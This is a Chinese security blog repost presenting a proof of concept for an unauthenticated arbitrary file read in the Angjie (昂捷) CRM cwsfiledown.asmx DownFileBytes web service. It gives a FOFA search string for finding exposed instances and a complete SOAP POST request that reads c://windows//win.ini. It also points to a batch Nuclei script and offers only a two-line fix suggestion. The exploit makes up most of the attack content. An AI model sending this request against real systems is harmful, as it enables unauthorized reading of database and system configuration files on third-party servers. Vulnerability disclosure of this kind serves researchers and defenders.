昂捷CRM cwsfiledown.asmx 任意文件读取漏洞 pOC

admin 2024年12月2日11:56:40评论20 views字数 1196阅读3分59秒阅读模式

 

0x02

产品介绍

昂捷CRM(Customer Relationship Management)是深圳市昂捷信息技术股份有限公司提供的一款专注于零售行业客户关系管理的系统。旨在帮助零售企业更好地管理客户、提升客户满意度和忠诚度,从而推动业务增长。该系统集成了客户信息管理、会员营销、客户服务等多个功能模块,为零售企业提供全方位的客户关系管理解决方案。
0x03

漏洞威胁

昂捷CRM cwsfiledown.asmx 接口DownFileBytes实例处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x04

漏洞环境

FOFA:

body="/ClientBin/slEnjoy.App.xap"

昂捷CRM cwsfiledown.asmx 任意文件读取漏洞 pOC

0x05

漏洞复现

PoC

POST /EnjoyRMIS_WS/WS/FileDown/cwsfiledown.asmx HTTP/1.1Host: Content-Type: text/xml; charset=utf-8Content-Length: lengthSOAPAction: "http://tempuri.org/DownFileBytes"<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <DownFileBytes xmlns="http://tempuri.org/">      <sFileName>c://windows//win.ini</sFileName>      <iPosition>1</iPosition>      <iReadBytesLen>100</iReadBytesLen>      <bReadBytes>ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg</bReadBytes>    </DownFileBytes>  </soap:Body></soap:Envelope>

昂捷CRM cwsfiledown.asmx 任意文件读取漏洞 pOC

0x06

批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

昂捷CRM cwsfiledown.asmx 任意文件读取漏洞 pOC

0x07

修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

0x08

 

原文始发于微信公众号(冷漠安全):「漏洞复现」昂捷CRM cwsfiledown.asmx 任意文件读取漏洞

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月2日11:56:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   昂捷CRM cwsfiledown.asmx 任意文件读取漏洞 pOChttps://cn-sec.com/archives/3454438.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息